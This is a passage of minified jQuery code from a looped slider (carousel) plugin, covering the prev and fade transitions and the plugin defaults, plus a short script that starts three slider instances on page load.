slides*width-width)});active=false});break;case"prev":times=times-1;distance=(-(times*width-width));current(times);if(o.autoHeight){autoHeight(times)}if(slides<3){if(times===0){$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:(-width)})}if(times===1){$(o.slides,$t).children(":eq(0)").css({position:"absolute",left:0})}}$(o.slides,$t).animate({left:distance},o.slidespeed,function(){if(times===0){times=slides;$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:(slides*width-width)});$(o.slides,$t).css({left:-(slides*width-width)});$(o.slides,$t).children(":eq(0)").css({left:(slides*width)})}if(times===2)$(o.slides,$t).children(":eq(0)").css({position:"absolute",left:0});if(times===1)$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:-width});active=false});break;case"fade":times=[times]*1;distance=(-(times*width-width));current(times);if(o.autoHeight){autoHeight(times)}$(o.slides,$t).children().fadeOut(o.fadespeed,function(){$(o.slides,$t).css({left:distance});$(o.slides,$t).children(":eq("+(slides-1)+")").css({left:slides*width-width});$(o.slides,$t).children(":eq(0)").css({left:0});if(times===slides){$(o.slides,$t).children(":eq(0)").css({left:(slides*width)})}if(times===1){$(o.slides,$t).children(":eq("+(slides-1)+")").css({position:"absolute",left:-width})}$(o.slides,$t).children().fadeIn(o.fadespeed);active=false});break;default:break}}})}});$.fn.loopedSlider.defaults={container:".container",slides:".slides",pagination:"pagination",containerClick:true,autoStart:0,restart:0,slidespeed:300,fadespeed:200,autoHeight:0,addPagination:false}})};
$(function(){ 
	$('#loopedslider').loopedSlider(); 
	$('#loopedslider2').loopedSlider(); 
	$('#loopedslider3').loopedSlider(); 
});
;

